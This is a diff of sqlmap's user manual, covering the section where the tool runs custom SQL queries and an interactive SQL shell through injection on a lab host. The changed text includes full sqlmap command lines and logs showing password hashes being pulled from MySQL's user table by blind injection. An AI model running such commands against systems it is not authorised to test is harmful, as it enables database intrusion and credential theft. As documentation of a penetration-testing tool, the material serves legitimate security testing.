Examples on a Microsoft SQL Server 2000 Service Pack 0 target: @@ -3402,9 +3406,9 @@ SELECT 'foo', 'bar': 'foo, bar'

As you can see from this last example, sqlmap splits the query in two different SELECT statement to be able to retrieve the output even -when using blind SQL injection technique. -Otherwise in inband SQL injection technique it only perform a single HTTP -request to get the user's query output: +when using the blind SQL injection technique. +Otherwise in UNION query SQL injection technique it only performs a single +HTTP request to get the user's query output: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \ @@ -3429,22 +3433,12 @@ SELECT 'foo', 'bar' [1]:

-Examples on an Oracle XE 10.2.0.1 target: - - -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-query \ - "SELECT 'foo' FROM dual" -v 0 - -[hh:mm:04] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] n -SELECT 'foo' FROM dual: 'foo' - - -

-As you can see, if your SELECT statement contains a FROM -clause, sqlmap asks the user if such statement can return multiple entries -and in such case the tool knows how to unpack the query correctly to -retrieve its whole output line per line when going through blind SQL -injection technique. +If your SELECT statement contains a FROM clause, sqlmap +asks the user if such statement can return multiple entries and in such +case the tool knows how to unpack the query correctly to retrieve its +whole output entry per entry when going through blind SQL injection +technique. Through UNION query SQL injection it retrieved the whole output +in a single response.

Example on a PostgreSQL 8.3.5 target: @@ -3453,9 +3447,9 @@ Example on a PostgreSQL 8.3.5 target: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query \ "SELECT usename FROM pg_user" -v 0 -[hh:mm:47] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y -[hh:mm:48] [INPUT] the SQL query that you provide can return up to 3 entries. How many -entries do you want to retrieve? +[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y +[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries +do you want to retrieve? [a] All (default) [#] Specific number [q] Quit @@ -3466,71 +3460,61 @@ SELECT usename FROM pg_user [2]:

-As you can see from the last example, sqlmap counts the number of entries -for your query and asks how many entries from the top you want to dump. +As you can see from the last example, sqlmap counted the number of entries +for your query and asks how many entries you want to dump. Otherwise if you specify also the LIMIT, or similar, clause -sqlmap will not ask anything, just unpack the query and return its -output line per line when going through blind SQL injection technique. +sqlmap will not ask anything, it just unpacks the query and return its +output entry per entry when going through blind SQL injection technique. +Through UNION query SQL injection it retrieved the whole output in a +single response.

Example on a MySQL 5.0.67 target: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query \ - "SELECT user, host, password FROM mysql.user LIMIT 1, 3" -v 1 + "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1 [...] back-end DBMS: MySQL >= 5.0.0 -[hh:mm:11] [INFO] fetching SQL SELECT query output: 'SELECT user, host, password FROM +[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM mysql.user LIMIT 1, 3' -[hh:mm:12] [INFO] the SQL query provided has more than a field. sqlmap will now unpack -it into distinct queries to be able to retrieve the output even if we are going blind -[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 1, 1 -[hh:mm:12] [INFO] retrieved: root -[hh:mm:12] [INFO] performed 34 queries in 0 seconds -[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 1, 1 -[hh:mm:12] [INFO] retrieved: localhost -[hh:mm:12] [INFO] performed 69 queries in 0 seconds -[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 1, 1 -[hh:mm:12] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B -[hh:mm:13] [INFO] performed 293 queries in 0 seconds -[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 2, 1 -[hh:mm:13] [INFO] retrieved: root -[hh:mm:13] [INFO] performed 34 queries in 0 seconds -[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 2, 1 -[hh:mm:13] [INFO] retrieved: leboyer -[hh:mm:13] [INFO] performed 55 queries in 0 seconds -[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 2, 1 -[hh:mm:13] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B -[hh:mm:14] [INFO] performed 293 queries in 0 seconds -[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 3, 1 -[hh:mm:14] [INFO] retrieved: root -[hh:mm:14] [INFO] performed 34 queries in 0 seconds -[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 3, 1 -[hh:mm:14] [INFO] retrieved: 192.168.1.121 -[hh:mm:14] [INFO] performed 69 queries in 0 seconds -[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user -ORDER BY user ASC LIMIT 3, 1 -[hh:mm:14] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B -[hh:mm:15] [INFO] performed 293 queries in 0 seconds -SELECT user, host, password FROM mysql.user LIMIT 1, 3 [3]: -[*] root, localhost, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B -[*] root, leboyer, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B -[*] root, 192.168.1.121, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B +[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it +into distinct queries to be able to retrieve the output even if we are going blind +[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM +mysql.user LIMIT 1, 1 +[hh:mm:22] [INFO] retrieved: localhost +[hh:mm:22] [INFO] performed 69 queries in 0 seconds +[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM +mysql.user LIMIT 1, 1 +[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 +[hh:mm:24] [INFO] performed 293 queries in 2 seconds +[hh:mm:24] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM +mysql.user LIMIT 2, 1 +[hh:mm:24] [INFO] retrieved: localhost +[hh:mm:25] [INFO] performed 69 queries in 0 seconds +[hh:mm:25] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM +mysql.user LIMIT 2, 1 +[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 +[hh:mm:27] [INFO] performed 293 queries in 2 seconds +[hh:mm:27] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM +mysql.user LIMIT 3, 1 +[hh:mm:27] [INFO] retrieved: localhost +[hh:mm:28] [INFO] performed 69 queries in 0 seconds +[hh:mm:28] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) +FROM mysql.user LIMIT 3, 1 +[hh:mm:28] [INFO] retrieved: +[hh:mm:28] [INFO] performed 6 queries in 0 seconds +SELECT host, password FROM mysql.user LIMIT 1, 3 [3]: +[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 +[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 +[*] localhost,

The SQL shell option gives you access to run your own SQL statement -interactively, like a SQL console logged into the back-end database +interactively, like a SQL console logged to the back-end database management system. This feature has TAB completion and history support. @@ -3701,6 +3685,21 @@ an asterisk instead of the column(s) name, sqlmap first retrieves the column names of the table then asks if the query can return multiple entries and goes on. +

+Example of SQL statement other than SELECT on an Oracle XE +10.2.0.1 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1 + +[...] +back-end DBMS: Oracle + +[hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER +sql> TODO + + + File system access